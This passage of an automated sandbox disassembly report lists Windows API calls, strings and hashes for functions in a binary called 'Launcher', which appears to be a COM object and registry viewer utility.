                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B69A0F
                                                                                                                • RegEnumValueW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?), ref: 00B69A41
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?), ref: 00B69AB4
                                                                                                                • #538.MFC42U(00000000), ref: 00B69AC2
                                                                                                                  • Part of subcall function 00B69634: memset.MSVCRT ref: 00B69884
                                                                                                                  • Part of subcall function 00B69634: _itow.MSVCRT ref: 00B698C3
                                                                                                                  • Part of subcall function 00B69634: lstrcpyW.KERNEL32(00000000,<cannot coerce data to string>), ref: 00B698FD
                                                                                                                  • Part of subcall function 00B69634: #800.MFC42U(00000000), ref: 00B69AE7
                                                                                                                  • Part of subcall function 00B69634: SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00B69AFE
                                                                                                                  • Part of subcall function 00B69634: RegCloseKey.ADVAPI32(?), ref: 00B69B07
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,00000000,?), ref: 00B69B16
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$#538#800Enum$MessageSendValuelstrcpy$CloseH_prolog3InfoOpenQuery_itowmemset
                                                                                                                • String ID: %#04X%04X (%lu)$%#08X (%lu)$%s = %s$%s [%s] = %s$%s [<no name>] = %s$<cannot coerce data to string>
                                                                                                                • API String ID: 88432742-3653656851
                                                                                                                • Opcode ID: 131921b20496befd27516987d521aea14435511c9b02be101952f1e1bf152be9
                                                                                                                • Instruction ID: 59dd874e9cbcf97d52b0ebd294a8dabd8bc1d7e6b157c043b59db0e0eab10185
                                                                                                                • Opcode Fuzzy Hash: 131921b20496befd27516987d521aea14435511c9b02be101952f1e1bf152be9
                                                                                                                • Instruction Fuzzy Hash: 1BF13D71A00209AFDF15DFA8DC85ABEB7F8EF19300F1044AAF516E7291DB799941CB60
                                                                                                                APIs
                                                                                                                • #1662.MFC42U ref: 00B648D9
                                                                                                                • #540.MFC42U ref: 00B648F3
                                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 00B64912
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 00B64936
                                                                                                                • MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00B64971
                                                                                                                • #2644.MFC42U ref: 00B649D1
                                                                                                                • #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00B649E9
                                                                                                                • #800.MFC42U(?,00000000), ref: 00B64A19
                                                                                                                • lstrlenW.KERNEL32(?), ref: 00B64A30
                                                                                                                • #2810.MFC42U(?,Warning: MkParseDisplayName only ate up to "%s".,?), ref: 00B64A82
                                                                                                                • #2644.MFC42U ref: 00B64B42
                                                                                                                • #800.MFC42U ref: 00B64B5D
                                                                                                                Strings
                                                                                                                • MkParseDisplayName(... "%s" ...) failed., xrefs: 00B649DD
                                                                                                                • Warning: MkParseDisplayName only ate up to "%s"., xrefs: 00B64A76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2644#2810#800$#1662#540BindCreateDisplayNameParselstrcpylstrlen
                                                                                                                • String ID: MkParseDisplayName(... "%s" ...) failed.$Warning: MkParseDisplayName only ate up to "%s".
                                                                                                                • API String ID: 3470803309-1365492349
                                                                                                                • Opcode ID: aed1e44c9ea8cbe71369fcacdd3f14fe319012531415af4fa57956baaeb79559
                                                                                                                • Instruction ID: 4c4fac4420a736fe6fcf62698eb7fc50aab296dc8853b91cca0683bfa1922b11
                                                                                                                • Opcode Fuzzy Hash: aed1e44c9ea8cbe71369fcacdd3f14fe319012531415af4fa57956baaeb79559
                                                                                                                • Instruction Fuzzy Hash: 6381917594122CAFCB60EFA4DC89BD9B7B4FB58311F1041E5E819A7261DB38AE84CF14
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B678ED: GetFocus.USER32 ref: 00B678ED
                                                                                                                  • Part of subcall function 00B678ED: #2859.MFC42U(00000000), ref: 00B678F4
                                                                                                                  • Part of subcall function 00B67980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6798C
                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000200), ref: 00B63522
                                                                                                                • GlobalLock.KERNEL32(?), ref: 00B63534
                                                                                                                • StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00B63553
                                                                                                                • wsprintfW.USER32 ref: 00B63650
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 00B6365F
                                                                                                                • EmptyClipboard.USER32 ref: 00B63670
                                                                                                                • SetClipboardData.USER32(0000000D,?), ref: 00B6367E
                                                                                                                • CloseClipboard.USER32 ref: 00B63684
                                                                                                                  • Part of subcall function 00B678FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00B6790C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlockwsprintf
                                                                                                                • String ID: <object classid="clsid:%s"></object>$P
                                                                                                                • API String ID: 2486233384-3677239044
                                                                                                                • Opcode ID: 84fb4b8b6afeaf98d62fdc09ebeca1616c3ad9850fddac071aa652296bc4d7ae
                                                                                                                • Instruction ID: 100621caf908afad42e51578f9e046359417a0c5d97e3eb4402bcaa395c20b18
                                                                                                                • Opcode Fuzzy Hash: 84fb4b8b6afeaf98d62fdc09ebeca1616c3ad9850fddac071aa652296bc4d7ae
                                                                                                                • Instruction Fuzzy Hash: BF51A274A05228DFEB20DB64CD49B99B7F5FF18305F0041EAE54AA7291EB785E84CF12
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00020008,000000FF), ref: 00B6DA51
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00B6DA58
                                                                                                                • malloc.MSVCRT ref: 00B6DA69
                                                                                                                • GetTokenInformation.ADVAPI32(000000FF,00000002,00000000,00008000,?), ref: 00B6DA81
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B6DAA2
                                                                                                                • EqualSid.ADVAPI32(00000004,?), ref: 00B6DABD
                                                                                                                • FreeSid.ADVAPI32(00000000), ref: 00B6DAE4
                                                                                                                • free.MSVCRT ref: 00B6DAEF
                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00B6DAFF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpenfreemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 4152120180-0
                                                                                                                • Opcode ID: 97b91db7ae90df089380fffa4330c5605373e82df9591b365fa46e71340b97cb
                                                                                                                • Instruction ID: 11e3cfb357fccea22d94eb4591525fae28d112411ef8a086bc5495dc504785d2
                                                                                                                • Opcode Fuzzy Hash: 97b91db7ae90df089380fffa4330c5605373e82df9591b365fa46e71340b97cb
                                                                                                                • Instruction Fuzzy Hash: 3E318B31E0520AAFDB20DFA4DC89AAEBBB8FB00712F140169E615A3190DB349E41CB50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B678ED: GetFocus.USER32 ref: 00B678ED
                                                                                                                  • Part of subcall function 00B678ED: #2859.MFC42U(00000000), ref: 00B678F4
                                                                                                                  • Part of subcall function 00B67980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6798C
                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000080), ref: 00B62F82
                                                                                                                • GlobalLock.KERNEL32(?), ref: 00B62F8E
                                                                                                                • StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00B62FA3
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 00B62FAC
                                                                                                                • EmptyClipboard.USER32 ref: 00B62FBA
                                                                                                                • SetClipboardData.USER32(0000000D,?), ref: 00B62FC5
                                                                                                                • CloseClipboard.USER32 ref: 00B62FCB
                                                                                                                  • Part of subcall function 00B678FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00B6790C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1702833241-0
                                                                                                                • Opcode ID: afd9d48fda243de431cc71187753fb67b93ae3bb1c4a2e4fb3cc86a7bac66385
                                                                                                                • Instruction ID: 45c53159b52c2af38371889ee725f8e542c6d42edb60a56e2064e5bb778cdfa7
                                                                                                                • Opcode Fuzzy Hash: afd9d48fda243de431cc71187753fb67b93ae3bb1c4a2e4fb3cc86a7bac66385
                                                                                                                • Instruction Fuzzy Hash: 7021E670D40208EFEF14ABA4D84ABADBBF4FF44306F1040A9E915A72A1EF785E44DB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 396fbb56de2531438a53531cf52fe8a671766fcba803d0ad55ca1cc2c819481d
                                                                                                                • Instruction ID: 3f2d2ce55079b3e3fe1b435594b7bfcc22baafc5e0bb374ced9bd3a8c3f9c91f
                                                                                                                • Opcode Fuzzy Hash: 396fbb56de2531438a53531cf52fe8a671766fcba803d0ad55ca1cc2c819481d
                                                                                                                • Instruction Fuzzy Hash: EA21F87790011AEBDB14DBD4DC45ABFBBECEB00351F2141AAF945EB194EB389D4097A0
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B6FE45
                                                                                                                • memset.MSVCRT ref: 00B6FE6B
                                                                                                                • memset.MSVCRT ref: 00B6FEF5
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00B6FF11
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B6FF31
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00B6FF3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                • String ID:
                                                                                                                • API String ID: 1045392073-0
                                                                                                                • Opcode ID: 943e4e2722c9fd7e72ed0b9a6e7737f05fd7259a7501e93ba58369b67b5ebf59
                                                                                                                • Instruction ID: e74cd2a088a264b95a03a30d57a3968bda8f14e7f0559e09d5ff835c69922853
                                                                                                                • Opcode Fuzzy Hash: 943e4e2722c9fd7e72ed0b9a6e7737f05fd7259a7501e93ba58369b67b5ebf59
                                                                                                                • Instruction Fuzzy Hash: 6E3109B5D0521D9BDB10EFA4D989BCCBBF8AF18301F1041EAE40DAB250EB759A84DF45
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B6FD12
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00B6FD21
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00B6FD2A
                                                                                                                • GetTickCount.KERNEL32 ref: 00B6FD33
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00B6FD48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 1445889803-0
                                                                                                                • Opcode ID: 94448bc373dc3e0b58c4c989711704dfe501b147081278fbb26769d5cbd8a96d
                                                                                                                • Instruction ID: a99c1f5c289649bfaa8ba83663d1610361fb981db6a851b2047ad49edaf77716
                                                                                                                • Opcode Fuzzy Hash: 94448bc373dc3e0b58c4c989711704dfe501b147081278fbb26769d5cbd8a96d
                                                                                                                • Instruction Fuzzy Hash: 2A110671D01209EFCB10DBB8E9486AEBBF4FF58712F9148A6D406E7214EB359B80DB40
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B6F602,00B59E34), ref: 00B6F4D3
                                                                                                                • UnhandledExceptionFilter.KERNEL32(00B6F602,?,00B6F602,00B59E34), ref: 00B6F4DC
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00B6F602,00B59E34), ref: 00B6F4E7
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00B6F602,00B59E34), ref: 00B6F4EE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3231755760-0
                                                                                                                • Opcode ID: 8abf0f2849f882813053c9776f2d20e08662c8625d668cd35784af79d42609e6
                                                                                                                • Instruction ID: bb994565da4d2be411cae95b031b088e0d890210d438a3f6588dd973729c9c7e
                                                                                                                • Opcode Fuzzy Hash: 8abf0f2849f882813053c9776f2d20e08662c8625d668cd35784af79d42609e6
                                                                                                                • Instruction Fuzzy Hash: 74D0CA32040208ABCB003BE9EC0DA4D3F28EBA9213F864810F30EA3C20DF3188C18B61
                                                                                                                APIs
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,0000000C,00000000,0000000C,00000001,?,00000000,00000001,?,?,00B6BA07,System,00000001,00000000), ref: 00B6C7E2
                                                                                                                • GetLastError.KERNEL32(?,00B6BA07,System,00000001,00000000), ref: 00B6C7EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DaclDescriptorErrorLastSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 914054853-0
                                                                                                                • Opcode ID: 241e9912000c8e011df10f82ae8bfc15c986a488868ccb6704ae0e7aca5f6f3c
                                                                                                                • Instruction ID: c032b1bfd084ff09550b32319e7a64825ec515d5a7337401770c3d0983c9f7a8
                                                                                                                • Opcode Fuzzy Hash: 241e9912000c8e011df10f82ae8bfc15c986a488868ccb6704ae0e7aca5f6f3c
                                                                                                                • Instruction Fuzzy Hash: 06F0A03764013ABBDB311A999C44F66BFA9FB407B5F118162FE489B150DB76DC1086E0
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001FA70), ref: 00B6FAC5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: f4d85649c41235dbcb5c794eecf2cfa2867b3b512703921a2210e9c535304dc8
                                                                                                                • Instruction ID: 8aa922d6bc25ba12843f4595517eba242a5d675c1f13cdf7ff5537778191057f
                                                                                                                • Opcode Fuzzy Hash: f4d85649c41235dbcb5c794eecf2cfa2867b3b512703921a2210e9c535304dc8
                                                                                                                • Instruction Fuzzy Hash: 109002A8291105464A0067B46C0981529E05A5871378258A0A04AD6864EF5540C05511
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2793039342-0
                                                                                                                • Opcode ID: 26b901727a1aebd3fd4cf67b34031ca3a598fedef88e1c7b9f21e58249c9b245
                                                                                                                • Instruction ID: 72a5c10138d1aadc9267088a723b8506306f9cb3af909c7106aee882f34cb3ca
                                                                                                                • Opcode Fuzzy Hash: 26b901727a1aebd3fd4cf67b34031ca3a598fedef88e1c7b9f21e58249c9b245
                                                                                                                • Instruction Fuzzy Hash: B3900271410040CBCE055B10ED084047B31FB453073200194D0694E0319B225862DA00
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B6C0C6
                                                                                                                • #540.MFC42U(00000488,00B5C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00B6C0F1
                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00B6C112
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C13A
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6C151
                                                                                                                • #800.MFC42U ref: 00B6C15F
                                                                                                                • malloc.MSVCRT ref: 00B6C174
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6C18D
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B6C1B4
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B6C1C2
                                                                                                                • free.MSVCRT ref: 00B6C1CD
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,?), ref: 00B6C1EC
                                                                                                                • GetLastError.KERNEL32 ref: 00B6C1F6
                                                                                                                • #2810.MFC42U(?,Everyone), ref: 00B6C21C
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B6C250
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00B6C283
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00B6C29A
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00B6C2CA
                                                                                                                • free.MSVCRT ref: 00B6C2D1
                                                                                                                • GetAce.ADVAPI32(00000000,00000000,?), ref: 00B6C2EB
                                                                                                                • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00B6C350
                                                                                                                • #2810.MFC42U(?,%s\%s,?,?), ref: 00B6C374
                                                                                                                • #2810.MFC42U(?,?? Unknown Account ??), ref: 00B6C38A
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B6C3BE
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00B6C3F5
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00B6C40C
                                                                                                                • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00B6C47D
                                                                                                                • #2810.MFC42U(?,%s\%s,?,?), ref: 00B6C4A1
                                                                                                                • #2810.MFC42U(?,?? Unknown Account ??), ref: 00B6C4B7
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B6C4EB
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00B6C522
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00B6C539
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00B6C569
                                                                                                                • #3993.MFC42U(00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 00B6C57F
                                                                                                                • GetAce.ADVAPI32(00000000,00000001,?,00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 00B6C593
                                                                                                                • GetLastError.KERNEL32 ref: 00B6C5AC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2810$Close$AccountErrorLastLookupQueryValuefree$#3993#540#800DaclDescriptorH_prolog3_OpenSecuritymalloc
                                                                                                                • String ID: %s\%s$?? Unknown ACE ??$?? Unknown Account ??$Everyone$Yes
                                                                                                                • API String ID: 47226287-2762826609
                                                                                                                • Opcode ID: b4b585494e5d23e17214838290e672e0e85b7cea4e71039139318e9a0271262f
                                                                                                                • Instruction ID: ff1a896f5a4cdefd969e6928170b194b8f27323a6ebbc010213e57e6e880c769
                                                                                                                • Opcode Fuzzy Hash: b4b585494e5d23e17214838290e672e0e85b7cea4e71039139318e9a0271262f
                                                                                                                • Instruction Fuzzy Hash: B1D1DCF190022C9FDB218F50DC84AEAB7FCEB48315F5045EAE649A3191DB749EC49F68
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00B61877
                                                                                                                • #540.MFC42U(00000058,00B5B66A), ref: 00B61884
                                                                                                                • #540.MFC42U(00000058,00B5B66A), ref: 00B61891
                                                                                                                • #540.MFC42U(00000058,00B5B66A), ref: 00B6189F
                                                                                                                • #4155.MFC42U(00000004,00000058,00B5B66A), ref: 00B618AD
                                                                                                                • #4155.MFC42U(00000005,00000004,00000058,00B5B66A), ref: 00B618B7
                                                                                                                • #3517.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B521A0,00000005), ref: 00B618DE
                                                                                                                • #858.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B521A0), ref: 00B618EB
                                                                                                                • #800.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B521A0), ref: 00B618F7
                                                                                                                • #2910.MFC42U(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B61910
                                                                                                                  • Part of subcall function 00B6DB5F: isspace.MSVCRT ref: 00B6DB7C
                                                                                                                  • Part of subcall function 00B6DB5F: isxdigit.MSVCRT ref: 00B6DBF6
                                                                                                                  • Part of subcall function 00B6DB5F: isspace.MSVCRT ref: 00B6DC2E
                                                                                                                  • Part of subcall function 00B6DB5F: isspace.MSVCRT ref: 00B6DC49
                                                                                                                  • Part of subcall function 00B6DB5F: isdigit.MSVCRT ref: 00B6DBCD
                                                                                                                  • Part of subcall function 00B6DB5F: isdigit.MSVCRT ref: 00B6DC1A
                                                                                                                  • Part of subcall function 00B6DB5F: toupper.MSVCRT ref: 00B6DBE3
                                                                                                                • #5906.MFC42U(00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61A67
                                                                                                                • #6205.MFC42U(?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61A80
                                                                                                                • #6205.MFC42U(?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61A92
                                                                                                                • #6191.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00B61A9D
